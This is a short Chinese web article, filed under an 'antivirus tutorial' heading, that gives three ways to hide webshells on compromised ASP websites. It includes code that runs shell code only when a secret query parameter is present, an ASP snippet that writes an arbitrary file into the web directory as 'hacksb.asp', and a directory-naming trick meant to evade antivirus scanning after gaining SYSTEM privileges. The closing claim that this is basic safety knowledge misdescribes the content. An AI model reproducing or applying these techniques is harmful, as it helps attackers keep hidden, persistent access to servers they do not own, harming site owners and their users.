明辉站/杀毒教程/内容

3种隐藏Webshell的方法

杀毒教程2023-04-15 阅读
[摘要]作者:普瑞斯特 第一种: 在我们要做手脚的asp文件里加入如下内容 <%if request("action")="ok" then%> shell代码插在这里 <%end if%> 访问的时候在你作手脚的asp文件后面加...

作者:普瑞斯特

第一种:

在我们要做手脚的asp文件里加入如下内容

<%if request("action")="ok" then%>

shell代码插在这里

<%end if%>

访问的时候在你作手脚的asp文件后面加上?action=ok,即可

第二种:

在我们要做手脚的asp文件里加入如下内容

<%

on error resume next

strFileName = Request.QueryString("filer")

set objStream = Server.createObject("ABODB.Stream")

objStream.Type = 1

objStream.Open

objStream.LoadFromFile strFileName

objStream.SaveToFile Server.mappath("hacksb.asp"),2

%>

访问的时候在做手脚的asp文件后面加上?filer=xxx,

xxx为你本地上传的一个路径如C:\hacksb.asp,

上传后在做手脚的asp的同文件夹中会自动生成hacksb.asp

第三种:

前提得到system权限,

进入网站目录下一层

mkdir s…

copy hacksb.asp s…/

这样杀毒软件找不到的

访问http://网站/s…/hacksb.asp即可


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

……

相关阅读